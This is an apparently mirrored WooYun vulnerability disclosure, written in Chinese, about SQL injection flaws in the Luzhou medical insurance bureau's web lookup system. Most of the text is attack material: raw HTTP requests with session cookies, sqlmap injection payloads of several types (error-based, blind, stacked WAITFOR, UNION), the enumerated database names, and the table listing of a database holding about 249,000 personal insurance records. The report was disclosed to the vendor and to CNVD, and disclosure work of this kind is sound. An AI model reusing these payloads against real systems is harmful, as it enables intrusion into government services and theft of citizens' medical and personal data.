乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-05: 厂商已经确认,细节仅向厂商公开 2015-11-15: 细节向核心白帽子及相关领域专家公开 2015-11-25: 细节向普通白帽子公开 2015-12-05: 细节向实习白帽子公开 2015-12-20: 细节向公众公开
泸州市医疗保险管理局多处SQL注入
http://**.**.**.**/lookup/yibaoht/user/loadinghos.asp?id=
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: id=-3437 OR 2039=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2039=2039) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(120)+CHAR(113)))---[12:12:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[12:12:19] [INFO] fetching database names[12:12:19] [WARNING] reflective value(s) found and filtering out[12:12:19] [INFO] the SQL query used returns 31 entriesavailable databases [31]:[*] aixin_data_store[*] CemeteryManage[*] chuanguoyuxi[*] dpf_data[*] ft1588[*] fya-cic[*] gjgl_ddb_store[*] gushumingmu[*] gzjmyy[*] jhhs[*] jingjishangcheng[*] jisi[*] jyqzzb[*] ljdqSys[*] lzggys[*] lzljpyx[*] lzppq[*] lzSanitation[*] lzsry[*] lzswzzb[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] science#_data_store[*] scrsy[*] tempdb[*] ydjyySys[*] yibao[*] yiw9
http://**.**.**.**/lookup/yibaoht/user/grxx.htm
POST /lookup/yibaoht/user/grxx.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://**.**.**.**/lookup/yibaoht/user/grxx.htmCookie: Forcast2004%2D0001=ViewUrl=Admin%5Flogin%2Easp&KEY=&purview=&UserName=®level=&fullname=; ASPSESSIONIDCCDRQSTQ=LDMBNFBCEAADOEAGKNJIPHFD; ASPSESSIONIDCCAQSTSQ=HIFJLJBCGOBOJFCNKJADCBCI; ASPSESSIONIDAAAQTSSQ=NHPJDLBCMNEHDJPDDIFBKCAF; ASPSESSIONIDCAATSTSQ=KAMLPMBCJLFJFJHGLIOIMFMAConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 43Sfzmhm=xxxxxxxxxxxxx&ICnumber=xxxxxxxxxxxxx
sqlmap resumed the following injection point(s) from stored session:---Parameter: ICnumber (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Sfzmhm=xxxxxxxxxxxxx&ICnumber=xxxxxxxxxxxxx'+(SELECT 'Qjza' WHERE 5313=5313 AND 7943=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7943=7943) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113))))+'---[12:13:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[12:13:49] [INFO] fetching database names[12:13:49] [INFO] the SQL query used returns 31 entriesavailable databases [31]:[*] aixin_data_store[*] CemeteryManage[*] chuanguoyuxi[*] dpf_data[*] ft1588[*] fya-cic[*] gjgl_ddb_store[*] gushumingmu[*] gzjmyy[*] jhhs[*] jingjishangcheng[*] jisi[*] jyqzzb[*] ljdqSys[*] lzggys[*] lzljpyx[*] lzppq[*] lzSanitation[*] lzsry[*] lzswzzb[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] science#_data_store[*] scrsy[*] tempdb[*] ydjyySys[*] yibao[*] yiw9
http://**.**.**.**/lookup/yibaoht/user/admin_index.htm
POST /lookup/yibaoht/user/ypshow.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://**.**.**.**/lookup/yibaoht/user/ypshow.aspCookie: Forcast2004%2D0001=ViewUrl=Admin%5Flogin%2Easp&KEY=&purview=&UserName=®level=&fullname=; ASPSESSIONIDCCDRQSTQ=LDMBNFBCEAADOEAGKNJIPHFD; ASPSESSIONIDCCAQSTSQ=HIFJLJBCGOBOJFCNKJADCBCI; ASPSESSIONIDAAAQTSSQ=NHPJDLBCMNEHDJPDDIFBKCAF; ASPSESSIONIDCAATSTSQ=KAMLPMBCJLFJFJHGLIOIMFMA; ASPSESSIONIDACBSSTSR=NLLBJPBCOOIIIGDFEFHJDFEKConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 35MedicineName=11&Submit=%B2%E9%D1%AF
sqlmap resumed the following injection point(s) from stored session:---Parameter: MedicineName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: MedicineName=11%' AND 8742=8742 AND '%'='&Submit=%B2%E9%D1%AF Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: MedicineName=11%' AND 8731=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8731=8731) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113))) AND '%'='&Submit=%B2%E9%D1%AF Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: MedicineName=11%';WAITFOR DELAY '0:0:5'--&Submit=%B2%E9%D1%AF Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: MedicineName=11%' AND 6086=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&Submit=%B2%E9%D1%AF Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: MedicineName=11%' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(87)+CHAR(80)+CHAR(86)+CHAR(81)+CHAR(83)+CHAR(117)+CHAR(77)+CHAR(120)+CHAR(86)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL-- &Submit=%B2%E9%D1%AF---[12:20:27] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2000[12:20:27] [INFO] fetching database names[12:20:27] [INFO] the SQL query used returns 31 entriesavailable databases [31]:[*] aixin_data_store[*] CemeteryManage[*] chuanguoyuxi[*] dpf_data[*] ft1588[*] fya-cic[*] gjgl_ddb_store[*] gushumingmu[*] gzjmyy[*] jhhs[*] jingjishangcheng[*] jisi[*] jyqzzb[*] ljdqSys[*] lzggys[*] lzljpyx[*] lzppq[*] lzSanitation[*] lzsry[*] lzswzzb[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] science#_data_store[*] scrsy[*] tempdb[*] ydjyySys[*] yibao[*] yiw9
Database: yibao+--------------------------+---------+| Table | Entries |+--------------------------+---------+| dbo.perinfo | 249448 || dbo.unitlevylist_view | 11748 || dbo.unitlevylist_view | 11748 || dbo.Item | 4341 || dbo.medicine | 3620 || dbo.peraccount | 417 || dbo.perclinicdetail_view | 279 || dbo.perclinicdetail_view | 279 || dbo.Hospital | 175 || dbo.perclinic_view | 142 || dbo.perclinic_view | 142 || dbo.perinhosdetail_view | 81 || dbo.perinhosdetail_view | 81 || dbo.unitlevv_view | 19 || dbo.unitlevv_view | 19 || dbo.unitlevv_view | 19 || dbo.sysconstraints | 8 || dbo.syssegments | 3 || dbo.Yhb | 3 || dbo.perinhos_view | 2 || dbo.perinhos_view | 2 || dbo.TongZhi | 1 |+--------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-11-05 14:29
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无